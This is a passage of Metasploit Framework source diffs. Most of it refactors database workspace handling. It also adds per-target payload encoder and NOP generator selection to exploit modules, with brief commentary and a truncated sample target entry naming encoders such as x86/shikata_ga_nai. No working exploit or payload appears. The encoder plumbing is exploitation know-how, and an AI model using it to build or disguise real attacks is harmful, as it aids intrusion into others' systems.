wspace = find_workspace(wspace)
|
|
||||||
opts[:workspace] = wspace
|
|
||||||
end
|
|
||||||
|
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework, false)
|
||||||
|
opts[:workspace] = wspace if wspace
|
||||||
|
|
||||||
id = opts.delete(:id)
|
id = opts.delete(:id)
|
||||||
Mdm::Loot.update(id, opts)
|
Mdm::Loot.update(id, opts)
|
||||||
}
|
}
|
||||||
|
|
|
@ -3,7 +3,7 @@ module Msf::DBManager::Note
|
||||||
# This method iterates the notes table calling the supplied block with the
|
# This method iterates the notes table calling the supplied block with the
|
||||||
# note instance of each entry.
|
# note instance of each entry.
|
||||||
#
|
#
|
||||||
def each_note(wspace=workspace, &block)
|
def each_note(wspace=framework.db.workspace, &block)
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace.notes.each do |note|
|
wspace.notes.each do |note|
|
||||||
block.call(note)
|
block.call(note)
|
||||||
|
@ -21,10 +21,20 @@ module Msf::DBManager::Note
|
||||||
#
|
#
|
||||||
# This methods returns a list of all notes in the database
|
# This methods returns a list of all notes in the database
|
||||||
#
|
#
|
||||||
def notes(wspace=workspace)
|
def notes(opts)
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace.notes
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
}
|
|
||||||
|
search_term = opts.delete(:search_term)
|
||||||
|
results = wspace.notes.includes(:host).where(opts)
|
||||||
|
if search_term && !search_term.empty?
|
||||||
|
re_search_term = /#{search_term}/mi
|
||||||
|
results = results.select { |note|
|
||||||
|
note.attribute_names.any? { |a| note[a.intern].to_s.match(re_search_term) }
|
||||||
|
}
|
||||||
|
end
|
||||||
|
results
|
||||||
|
}
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
|
@ -55,10 +65,7 @@ module Msf::DBManager::Note
|
||||||
def report_note(opts)
|
def report_note(opts)
|
||||||
return if not active
|
return if not active
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace = opts.delete(:workspace) || workspace
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
if wspace.kind_of? String
|
|
||||||
wspace = find_workspace(wspace)
|
|
||||||
end
|
|
||||||
seen = opts.delete(:seen) || false
|
seen = opts.delete(:seen) || false
|
||||||
crit = opts.delete(:critical) || false
|
crit = opts.delete(:critical) || false
|
||||||
host = nil
|
host = nil
|
||||||
|
@ -110,13 +117,7 @@ module Msf::DBManager::Note
|
||||||
elsif opts[:service] and opts[:service].kind_of? ::Mdm::Service
|
elsif opts[:service] and opts[:service].kind_of? ::Mdm::Service
|
||||||
service = opts[:service]
|
service = opts[:service]
|
||||||
end
|
end
|
||||||
=begin
|
|
||||||
if host
|
|
||||||
host.updated_at = host.created_at
|
|
||||||
host.state = HostState::Alive
|
|
||||||
host.save!
|
|
||||||
end
|
|
||||||
=end
|
|
||||||
ntype = opts.delete(:type) || opts.delete(:ntype) || (raise RuntimeError, "A note :type or :ntype is required")
|
ntype = opts.delete(:type) || opts.delete(:ntype) || (raise RuntimeError, "A note :type or :ntype is required")
|
||||||
data = opts[:data]
|
data = opts[:data]
|
||||||
note = nil
|
note = nil
|
||||||
|
@ -171,4 +172,42 @@ module Msf::DBManager::Note
|
||||||
ret[:note] = note
|
ret[:note] = note
|
||||||
}
|
}
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Update the attributes of a note entry with the values in opts.
|
||||||
|
# The values in opts should match the attributes to update.
|
||||||
|
#
|
||||||
|
# @param opts [Hash] Hash containing the updated values. Key should match the attribute to update. Must contain :id of record to update.
|
||||||
|
# @return [Mdm::Note] The updated Mdm::Note object.
|
||||||
|
def update_note(opts)
|
||||||
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework, false)
|
||||||
|
opts[:workspace] = wspace if wspace
|
||||||
|
|
||||||
|
id = opts.delete(:id)
|
||||||
|
Mdm::Note.update(id, opts)
|
||||||
|
}
|
||||||
|
end
|
||||||
|
|
||||||
|
# Deletes note entries based on the IDs passed in.
|
||||||
|
#
|
||||||
|
# @param opts[:ids] [Array] Array containing Integers corresponding to the IDs of the note entries to delete.
|
||||||
|
# @return [Array] Array containing the Mdm::Note objects that were successfully deleted.
|
||||||
|
def delete_note(opts)
|
||||||
|
raise ArgumentError.new("The following options are required: :ids") if opts[:ids].nil?
|
||||||
|
|
||||||
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
|
deleted = []
|
||||||
|
opts[:ids].each do |note_id|
|
||||||
|
note = Mdm::Note.find(note_id)
|
||||||
|
begin
|
||||||
|
deleted << note.destroy
|
||||||
|
rescue # refs suck
|
||||||
|
elog("Forcibly deleting #{note}")
|
||||||
|
deleted << note.delete
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
return deleted
|
||||||
|
}
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -78,7 +78,7 @@ module Msf::DBManager::Report
|
||||||
#
|
#
|
||||||
# This methods returns a list of all reports in the database
|
# This methods returns a list of all reports in the database
|
||||||
#
|
#
|
||||||
def reports(wspace=workspace)
|
def reports(wspace=framework.db.workspace)
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace.reports
|
wspace.reports
|
||||||
}
|
}
|
||||||
|
|
|
@ -21,7 +21,7 @@ module Msf::DBManager::Service
|
||||||
|
|
||||||
# Iterates over the services table calling the supplied block with the
|
# Iterates over the services table calling the supplied block with the
|
||||||
# service instance of each entry.
|
# service instance of each entry.
|
||||||
def each_service(wspace=workspace, &block)
|
def each_service(wspace=framework.db.workspace, &block)
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace.services.each do |service|
|
wspace.services.each do |service|
|
||||||
block.call(service)
|
block.call(service)
|
||||||
|
@ -61,7 +61,7 @@ module Msf::DBManager::Service
|
||||||
hname = opts.delete(:host_name)
|
hname = opts.delete(:host_name)
|
||||||
hmac = opts.delete(:mac)
|
hmac = opts.delete(:mac)
|
||||||
host = nil
|
host = nil
|
||||||
wspace = opts.delete(:workspace) || workspace
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
hopts = {:workspace => wspace, :host => addr}
|
hopts = {:workspace => wspace, :host => addr}
|
||||||
hopts[:name] = hname if hname
|
hopts[:name] = hname if hname
|
||||||
hopts[:mac] = hmac if hmac
|
hopts[:mac] = hmac if hmac
|
||||||
|
@ -141,10 +141,8 @@ module Msf::DBManager::Service
|
||||||
|
|
||||||
# Returns a list of all services in the database
|
# Returns a list of all services in the database
|
||||||
def services(opts)
|
def services(opts)
|
||||||
wspace = opts.delete(:workspace) || workspace
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
if wspace.kind_of? String
|
|
||||||
wspace = find_workspace(wspace)
|
|
||||||
end
|
|
||||||
search_term = opts.delete(:search_term)
|
search_term = opts.delete(:search_term)
|
||||||
opts["hosts.address"] = opts.delete(:addresses)
|
opts["hosts.address"] = opts.delete(:addresses)
|
||||||
opts.compact!
|
opts.compact!
|
||||||
|
|
|
@ -13,7 +13,7 @@ module Msf::DBManager::Session
|
||||||
def get_session(opts)
|
def get_session(opts)
|
||||||
return if not active
|
return if not active
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace = opts[:workspace] || opts[:wspace] || workspace
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
addr = opts[:addr] || opts[:address] || opts[:host] || return
|
addr = opts[:addr] || opts[:address] || opts[:host] || return
|
||||||
host = get_host(:workspace => wspace, :host => addr)
|
host = get_host(:workspace => wspace, :host => addr)
|
||||||
time = opts[:opened_at] || opts[:created_at] || opts[:time] || return
|
time = opts[:opened_at] || opts[:created_at] || opts[:time] || return
|
||||||
|
@ -119,12 +119,12 @@ module Msf::DBManager::Session
|
||||||
return if not active
|
return if not active
|
||||||
|
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
workspace = find_workspace(session_dto[:workspace])
|
|
||||||
host_data = session_dto[:host_data]
|
host_data = session_dto[:host_data]
|
||||||
|
workspace = workspaces({ name: host_data[:workspace] })
|
||||||
h_opts = {}
|
h_opts = {}
|
||||||
h_opts[:host] = host_data[:host]
|
h_opts[:host] = host_data[:host]
|
||||||
h_opts[:arch] = host_data[:arch]
|
h_opts[:arch] = host_data[:arch]
|
||||||
h_opts[:workspace] = workspace
|
h_opts[:workspace] = host_data[:workspace]
|
||||||
host = find_or_create_host(h_opts)
|
host = find_or_create_host(h_opts)
|
||||||
|
|
||||||
session_data = session_dto[:session_data]
|
session_data = session_dto[:session_data]
|
||||||
|
|
|
@ -1,11 +1,6 @@
|
||||||
module Msf::DBManager::SessionEvent
|
module Msf::DBManager::SessionEvent
|
||||||
|
|
||||||
def session_events(opts)
|
def session_events(opts)
|
||||||
wspace = opts[:workspace] || opts[:wspace] || workspace
|
|
||||||
if wspace.kind_of? String
|
|
||||||
wspace = find_workspace(wspace)
|
|
||||||
end
|
|
||||||
|
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
conditions = {}
|
conditions = {}
|
||||||
|
|
||||||
|
|
|
@ -9,7 +9,7 @@ module Msf::DBManager::Task
|
||||||
def report_task(opts)
|
def report_task(opts)
|
||||||
return if not active
|
return if not active
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace = opts.delete(:workspace) || workspace
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
path = opts.delete(:path) || (raise RuntimeError, "A task :path is required")
|
path = opts.delete(:path) || (raise RuntimeError, "A task :path is required")
|
||||||
|
|
||||||
ret = {}
|
ret = {}
|
||||||
|
@ -49,7 +49,7 @@ module Msf::DBManager::Task
|
||||||
#
|
#
|
||||||
# This methods returns a list of all tasks in the database
|
# This methods returns a list of all tasks in the database
|
||||||
#
|
#
|
||||||
def tasks(wspace=workspace)
|
def tasks(wspace=framework.db.workspace)
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace.tasks
|
wspace.tasks
|
||||||
}
|
}
|
||||||
|
|
|
@ -3,7 +3,7 @@ module Msf::DBManager::Vuln
|
||||||
# This method iterates the vulns table calling the supplied block with the
|
# This method iterates the vulns table calling the supplied block with the
|
||||||
# vuln instance of each entry.
|
# vuln instance of each entry.
|
||||||
#
|
#
|
||||||
def each_vuln(wspace=workspace,&block)
|
def each_vuln(wspace=framework.db.workspace, &block)
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace.vulns.each do |vulns|
|
wspace.vulns.each do |vulns|
|
||||||
block.call(vulns)
|
block.call(vulns)
|
||||||
|
@ -94,8 +94,7 @@ module Msf::DBManager::Vuln
|
||||||
info = opts[:info]
|
info = opts[:info]
|
||||||
|
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
wspace = opts.delete(:workspace) || workspace
|
|
||||||
exploited_at = opts[:exploited_at] || opts["exploited_at"]
|
exploited_at = opts[:exploited_at] || opts["exploited_at"]
|
||||||
details = opts.delete(:details)
|
details = opts.delete(:details)
|
||||||
rids = opts.delete(:ref_ids)
|
rids = opts.delete(:ref_ids)
|
||||||
|
@ -236,12 +235,8 @@ module Msf::DBManager::Vuln
|
||||||
# This methods returns a list of all vulnerabilities in the database
|
# This methods returns a list of all vulnerabilities in the database
|
||||||
#
|
#
|
||||||
def vulns(opts)
|
def vulns(opts)
|
||||||
wspace = opts.delete(:workspace) || opts.delete(:wspace) || workspace
|
|
||||||
if wspace.kind_of? String
|
|
||||||
wspace = find_workspace(wspace)
|
|
||||||
end
|
|
||||||
|
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
|
|
||||||
search_term = opts.delete(:search_term)
|
search_term = opts.delete(:search_term)
|
||||||
if search_term && !search_term.empty?
|
if search_term && !search_term.empty?
|
||||||
|
@ -259,17 +254,12 @@ module Msf::DBManager::Vuln
|
||||||
# @param opts [Hash] Hash containing the updated values. Key should match the attribute to update. Must contain :id of record to update.
|
# @param opts [Hash] Hash containing the updated values. Key should match the attribute to update. Must contain :id of record to update.
|
||||||
# @return [Mdm::Vuln] The updated Mdm::Vuln object.
|
# @return [Mdm::Vuln] The updated Mdm::Vuln object.
|
||||||
def update_vuln(opts)
|
def update_vuln(opts)
|
||||||
# process workspace string for update if included in opts
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace = opts.delete(:workspace)
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework, false)
|
||||||
if wspace.kind_of? String
|
opts[:workspace] = wspace if wspace
|
||||||
wspace = find_workspace(wspace)
|
id = opts.delete(:id)
|
||||||
opts[:workspace] = wspace
|
Mdm::Vuln.update(id, opts)
|
||||||
end
|
}
|
||||||
|
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
|
||||||
id = opts.delete(:id)
|
|
||||||
Mdm::Vuln.update(id, opts)
|
|
||||||
}
|
|
||||||
end
|
end
|
||||||
|
|
||||||
# Deletes Vuln entries based on the IDs passed in.
|
# Deletes Vuln entries based on the IDs passed in.
|
||||||
|
@ -279,19 +269,19 @@ module Msf::DBManager::Vuln
|
||||||
def delete_vuln(opts)
|
def delete_vuln(opts)
|
||||||
raise ArgumentError.new("The following options are required: :ids") if opts[:ids].nil?
|
raise ArgumentError.new("The following options are required: :ids") if opts[:ids].nil?
|
||||||
|
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
deleted = []
|
deleted = []
|
||||||
opts[:ids].each do |vuln_id|
|
opts[:ids].each do |vuln_id|
|
||||||
vuln = Mdm::Vuln.find(vuln_id)
|
vuln = Mdm::Vuln.find(vuln_id)
|
||||||
begin
|
begin
|
||||||
deleted << vuln.destroy
|
deleted << vuln.destroy
|
||||||
rescue # refs suck
|
rescue # refs suck
|
||||||
elog("Forcibly deleting #{vuln}")
|
elog("Forcibly deleting #{vuln}")
|
||||||
deleted << vuln.delete
|
deleted << vuln.delete
|
||||||
end
|
|
||||||
end
|
end
|
||||||
|
end
|
||||||
|
|
||||||
return deleted
|
return deleted
|
||||||
}
|
}
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -22,20 +22,17 @@ module Msf::DBManager::VulnAttempt
|
||||||
# This methods returns a list of all vulnerability attempts in the database
|
# This methods returns a list of all vulnerability attempts in the database
|
||||||
#
|
#
|
||||||
def vuln_attempts(opts)
|
def vuln_attempts(opts)
|
||||||
wspace = opts.delete(:workspace) || opts.delete(:wspace) || workspace
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
if wspace.kind_of? String
|
# 'workspace' is not a valid attribute for Mdm::VulnAttempt. Remove it.
|
||||||
wspace = find_workspace(wspace)
|
Msf::Util::DBManager.delete_opts_workspace(opts)
|
||||||
|
|
||||||
|
search_term = opts.delete(:search_term)
|
||||||
|
if search_term && !search_term.empty?
|
||||||
|
column_search_conditions = Msf::Util::DBManager.create_all_column_search_conditions(Mdm::VulnAttempt, search_term)
|
||||||
|
Mdm::VulnAttempt.where(opts).where(column_search_conditions)
|
||||||
|
else
|
||||||
|
Mdm::VulnAttempt.where(opts)
|
||||||
end
|
end
|
||||||
|
}
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
|
||||||
|
|
||||||
search_term = opts.delete(:search_term)
|
|
||||||
if search_term && !search_term.empty?
|
|
||||||
column_search_conditions = Msf::Util::DBManager.create_all_column_search_conditions(Mdm::VulnAttempt, search_term)
|
|
||||||
Mdm::VulnAttempt.where(opts).where(column_search_conditions)
|
|
||||||
else
|
|
||||||
Mdm::VulnAttempt.where(opts)
|
|
||||||
end
|
|
||||||
}
|
|
||||||
end
|
end
|
||||||
end
|
end
|
|
@ -20,7 +20,7 @@ module Msf::DBManager::Web
|
||||||
def report_web_form(opts)
|
def report_web_form(opts)
|
||||||
return if not active
|
return if not active
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace = opts.delete(:workspace) || workspace
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
|
|
||||||
path = opts[:path]
|
path = opts[:path]
|
||||||
meth = opts[:method].to_s.upcase
|
meth = opts[:method].to_s.upcase
|
||||||
|
@ -107,7 +107,7 @@ module Msf::DBManager::Web
|
||||||
def report_web_page(opts)
|
def report_web_page(opts)
|
||||||
return if not active
|
return if not active
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace = opts.delete(:workspace) || workspace
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
|
|
||||||
path = opts[:path]
|
path = opts[:path]
|
||||||
code = opts[:code].to_i
|
code = opts[:code].to_i
|
||||||
|
@ -188,7 +188,7 @@ module Msf::DBManager::Web
|
||||||
def report_web_site(opts)
|
def report_web_site(opts)
|
||||||
return if not active
|
return if not active
|
||||||
::ActiveRecord::Base.connection_pool.with_connection { |conn|
|
::ActiveRecord::Base.connection_pool.with_connection { |conn|
|
||||||
wspace = opts.delete(:workspace) || workspace
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
vhost = opts.delete(:vhost)
|
vhost = opts.delete(:vhost)
|
||||||
|
|
||||||
addr = nil
|
addr = nil
|
||||||
|
@ -289,7 +289,7 @@ module Msf::DBManager::Web
|
||||||
def report_web_vuln(opts)
|
def report_web_vuln(opts)
|
||||||
return if not active
|
return if not active
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace = opts.delete(:workspace) || workspace
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
|
|
||||||
path = opts[:path]
|
path = opts[:path]
|
||||||
meth = opts[:method]
|
meth = opts[:method]
|
||||||
|
|
|
@ -1,17 +1,24 @@
|
||||||
module Msf::DBManager::Workspace
|
module Msf::DBManager::Workspace
|
||||||
|
|
||||||
|
DEFAULT_WORKSPACE_NAME = 'default'
|
||||||
#
|
#
|
||||||
# Creates a new workspace in the database
|
# Creates a new workspace in the database
|
||||||
#
|
#
|
||||||
def add_workspace(name)
|
def add_workspace(opts)
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
::Mdm::Workspace.where(name: name).first_or_create
|
::Mdm::Workspace.where(name: opts[:name]).first_or_create
|
||||||
}
|
}
|
||||||
end
|
end
|
||||||
|
|
||||||
def default_workspace
|
def default_workspace
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
# Workspace tracking is handled on the client side, so attempting to call it directly from the DbManager
|
||||||
::Mdm::Workspace.default
|
# will not return the correct results. Run it back through the proxy.
|
||||||
}
|
|
||||||
|
|
||||||
|
wlog "[DEPRECATION] Setting the workspace from within DbManager is no longer supported. Please call from WorkspaceDataProxy instead."
|
||||||
|
|
||||||
|
# Proxied to fix tests, will be cleaned up in remote test patch
|
||||||
|
framework.db.default_workspace
|
||||||
end
|
end
|
||||||
|
|
||||||
def find_workspace(name)
|
def find_workspace(name)
|
||||||
|
@ -21,102 +28,75 @@ module Msf::DBManager::Workspace
|
||||||
end
|
end
|
||||||
|
|
||||||
def workspace
|
def workspace
|
||||||
framework.db.find_workspace(@workspace_name)
|
# The @current_workspace is tracked on the client side, so attempting to call it directly from the DbManager
|
||||||
|
# will not return the correct results. Run it back through the proxy.
|
||||||
|
wlog "[DEPRECATION] Calling workspace from within DbManager is no longer supported. Please call from WorkspaceDataProxy instead."
|
||||||
|
|
||||||
|
# Proxied to fix tests, will be cleaned up in remote test patch
|
||||||
|
framework.db.workspace
|
||||||
end
|
end
|
||||||
|
|
||||||
def workspace=(workspace)
|
def workspace=(workspace)
|
||||||
@workspace_name = workspace.name
|
# The @current_workspace is tracked on the client side, so attempting to call it directly from the DbManager
|
||||||
|
# will not return the correct results. Run it back through the proxy.
|
||||||
|
wlog "[DEPRECATION] Setting the workspace from within DbManager is no longer supported. Please call from WorkspaceDataProxy instead."
|
||||||
|
|
||||||
|
# Proxied to fix tests, will be cleaned up in remote test patch
|
||||||
|
framework.db.workspace=workspace
|
||||||
end
|
end
|
||||||
|
|
||||||
def workspaces
|
def workspaces(opts = {})
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
::Mdm::Workspace.order('updated_at asc').load
|
search_term = opts.delete(:search_term)
|
||||||
|
# Passing these values to the search will cause exceptions, so remove them if they accidentally got passed in.
|
||||||
|
Msf::Util::DBManager.delete_opts_workspace(opts)
|
||||||
|
|
||||||
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
|
if search_term && !search_term.empty?
|
||||||
|
column_search_conditions = Msf::Util::DBManager.create_all_column_search_conditions(Mdm::Workspace, search_term)
|
||||||
|
Mdm::Workspace.where(opts).where(column_search_conditions)
|
||||||
|
else
|
||||||
|
Mdm::Workspace.where(opts)
|
||||||
|
end
|
||||||
|
}
|
||||||
}
|
}
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
def delete_workspaces(opts)
|
||||||
# Returns an array of all the associated workspace records counts.
|
raise ArgumentError.new("The following options are required: :ids") if opts[:ids].nil?
|
||||||
#
|
|
||||||
def workspace_associations_counts()
|
|
||||||
results = Array.new()
|
|
||||||
|
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
workspaces.each do |ws|
|
deleted = []
|
||||||
results << {
|
default_deleted = false
|
||||||
:name => ws.name,
|
opts[:ids].each do |ws_id|
|
||||||
:hosts_count => ws.hosts.count,
|
ws = Mdm::Workspace.find(ws_id)
|
||||||
:services_count => ws.services.count,
|
default_deleted = true if ws.default?
|
||||||
:vulns_count => ws.vulns.count,
|
begin
|
||||||
:creds_count => ws.core_credentials.count,
|
deleted << ws.destroy
|
||||||
:loots_count => ws.loots.count,
|
if default_deleted
|
||||||
:notes_count => ws.notes.count
|
add_workspace({ name: DEFAULT_WORKSPACE_NAME })
|
||||||
}
|
default_deleted = false
|
||||||
end
|
end
|
||||||
}
|
rescue
|
||||||
|
elog("Forcibly deleting #{ws.name}")
|
||||||
return results
|
deleted << ws.delete
|
||||||
end
|
|
||||||
|
|
||||||
def delete_all_workspaces()
|
|
||||||
return delete_workspaces(workspaces.map(&:name))
|
|
||||||
end
|
|
||||||
|
|
||||||
def delete_workspaces(names)
|
|
||||||
status_msg = []
|
|
||||||
error_msg = []
|
|
||||||
|
|
||||||
switched = false
|
|
||||||
# Delete workspaces
|
|
||||||
names.each do |name|
|
|
||||||
workspace = framework.db.find_workspace(name)
|
|
||||||
if workspace.nil?
|
|
||||||
error_msg << "Workspace not found: #{name}"
|
|
||||||
elsif workspace.default?
|
|
||||||
workspace.destroy
|
|
||||||
workspace = framework.db.add_workspace(name)
|
|
||||||
status_msg << 'Deleted and recreated the default workspace'
|
|
||||||
else
|
|
||||||
# switch to the default workspace if we're about to delete the current one
|
|
||||||
if framework.db.workspace.name == workspace.name
|
|
||||||
framework.db.workspace = framework.db.default_workspace
|
|
||||||
switched = true
|
|
||||||
end
|
end
|
||||||
# now destroy the named workspace
|
|
||||||
workspace.destroy
|
|
||||||
status_msg << "Deleted workspace: #{name}"
|
|
||||||
end
|
end
|
||||||
end
|
|
||||||
(status_msg << "Switched workspace: #{framework.db.workspace.name}") if switched
|
return deleted
|
||||||
return status_msg, error_msg
|
}
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
def update_workspace(opts)
|
||||||
# Renames a workspace
|
raise ArgumentError.new("The following options are required: :id") if opts[:id].nil?
|
||||||
#
|
Msf::Util::DBManager.delete_opts_workspace(opts)
|
||||||
def rename_workspace(from_name, to_name)
|
|
||||||
raise "Workspace exists: #{to_name}" if framework.db.find_workspace(to_name)
|
|
||||||
|
|
||||||
workspace = find_workspace(from_name)
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
raise "Workspace not found: #{name}" if workspace.nil?
|
ws_to_update = workspaces({ id: opts.delete(:id) }).first
|
||||||
|
default_renamed = true if ws_to_update.name == DEFAULT_WORKSPACE_NAME
|
||||||
workspace.name = new
|
updated_ws = Mdm::Workspace.update(ws_to_update.id, opts)
|
||||||
workspace.save!
|
add_workspace({ name: DEFAULT_WORKSPACE_NAME }) if default_renamed
|
||||||
|
updated_ws
|
||||||
# Recreate the default workspace to avoid errors
|
}
|
||||||
if workspace.default?
|
|
||||||
framework.db.add_workspace(from_name)
|
|
||||||
#print_status("Recreated default workspace after rename")
|
|
||||||
end
|
|
||||||
|
|
||||||
# Switch to new workspace if old name was active
|
|
||||||
if (@workspace_name == workspace.name)
|
|
||||||
framework.db.workspace = workspace
|
|
||||||
#print_status("Switched workspace: #{framework.db.workspace.name}")
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
def get_workspace(opts)
|
|
||||||
workspace = opts.delete(:wspace) || opts.delete(:workspace) || workspace
|
|
||||||
find_workspace(workspace) if (workspace.is_a?(String))
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@@ -550,8 +550,8 @@ class Exploit < Msf::Module
     reqs['AppendEncoder'] = payload_append_encoder(explicit_target)
     reqs['MaxNops'] = payload_max_nops(explicit_target)
     reqs['MinNops'] = payload_min_nops(explicit_target)
-    reqs['Encoder'] = datastore['ENCODER']
-    reqs['Nop'] = datastore['NOP']
+    reqs['Encoder'] = datastore['ENCODER'] || payload_encoder(explicit_target)
+    reqs['Nop'] = datastore['NOP'] || payload_nop(explicit_target)
     reqs['EncoderType'] = payload_encoder_type(explicit_target)
     reqs['EncoderOptions'] = payload_encoder_options(explicit_target)
     reqs['ExtendedOptions'] = payload_extended_options(explicit_target)
@@ -916,9 +916,37 @@ class Exploit < Msf::Module
     end
   end

+  #
+  # Returns the payload encoder that is associated with either the
+  # current target or the exploit in general.
+  #
+  def payload_encoder(explicit_target = nil)
+    explicit_target ||= target
+
+    if (explicit_target and explicit_target.payload_encoder)
+      explicit_target.payload_encoder
+    else
+      payload_info['Encoder']
+    end
+  end
+
+  #
+  # Returns the payload NOP generator that is associated with either the
+  # current target or the exploit in general.
+  #
+  def payload_nop(explicit_target = nil)
+    explicit_target ||= target
+
+    if (explicit_target and explicit_target.payload_nop)
+      explicit_target.payload_nop
+    else
+      payload_info['Nop']
+    end
+  end
+
   #
   # Returns the payload encoder type that is associated with either the
-  # current target of the exploit in general.
+  # current target or the exploit in general.
   #
   def payload_encoder_type(explicit_target = nil)
     explicit_target ||= target
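The two new lookups only kick in when the user has not forced a value: `datastore['ENCODER'] || payload_encoder(explicit_target)` means an explicit `set ENCODER ...` still wins, and the target-level hint is a fallback. A plain-Ruby illustration of that precedence; the method and variable names below are generic, not Metasploit API:

```ruby
# Plain-Ruby illustration of the `a || b` fallback used for Encoder/Nop above.
def effective_encoder(datastore, target_payload_opts)
  datastore['ENCODER'] || target_payload_opts['Encoder']
end

puts effective_encoder({ 'ENCODER' => 'x86/alpha_mixed' }, { 'Encoder' => 'x86/shikata_ga_nai' })
# => x86/alpha_mixed    (user override wins)
puts effective_encoder({}, { 'Encoder' => 'x86/shikata_ga_nai' })
# => x86/shikata_ga_nai (target-level hint used as fallback)
```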
@@ -233,6 +233,22 @@ class Msf::Module::Target
     opts['Payload'] ? opts['Payload']['Space'] : nil
   end

+  #
+  # The payload encoder or encoders that can be used when generating the
+  # encoded payload (such as x86/shikata_ga_nai and so on).
+  #
+  def payload_encoder
+    opts['Payload'] ? opts['Payload']['Encoder'] : nil
+  end
+
+  #
+  # The payload NOP generator or generators that can be used when generating the
+  # encoded payload (such as x86/opty2 and so on).
+  #
+  def payload_nop
+    opts['Payload'] ? opts['Payload']['Nop'] : nil
+  end
+
   #
   # The payload encoder type or types that can be used when generating the
   # encoded payload (such as alphanum, unicode, xor, and so on).
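With `Target#payload_encoder` and `Target#payload_nop` reading from the target's `'Payload'` options hash, an exploit can hint a preferred encoder or NOP generator per target. A sketch of what such a target entry might look like; the module metadata below is hypothetical, and only the `'Encoder'` and `'Nop'` keys correspond to the accessors added above:

```ruby
# Hypothetical excerpt of an exploit module's metadata hash. Only the
# 'Payload' => { 'Encoder' ..., 'Nop' ... } keys are what the new
# Target#payload_encoder / Target#payload_nop accessors read.
module_info = {
  'Targets' => [
    [
      'Windows 7 SP1',
      {
        'Ret'     => 0x41414141,             # placeholder return address
        'Payload' => {
          'Encoder' => 'x86/shikata_ga_nai', # returned by payload_encoder
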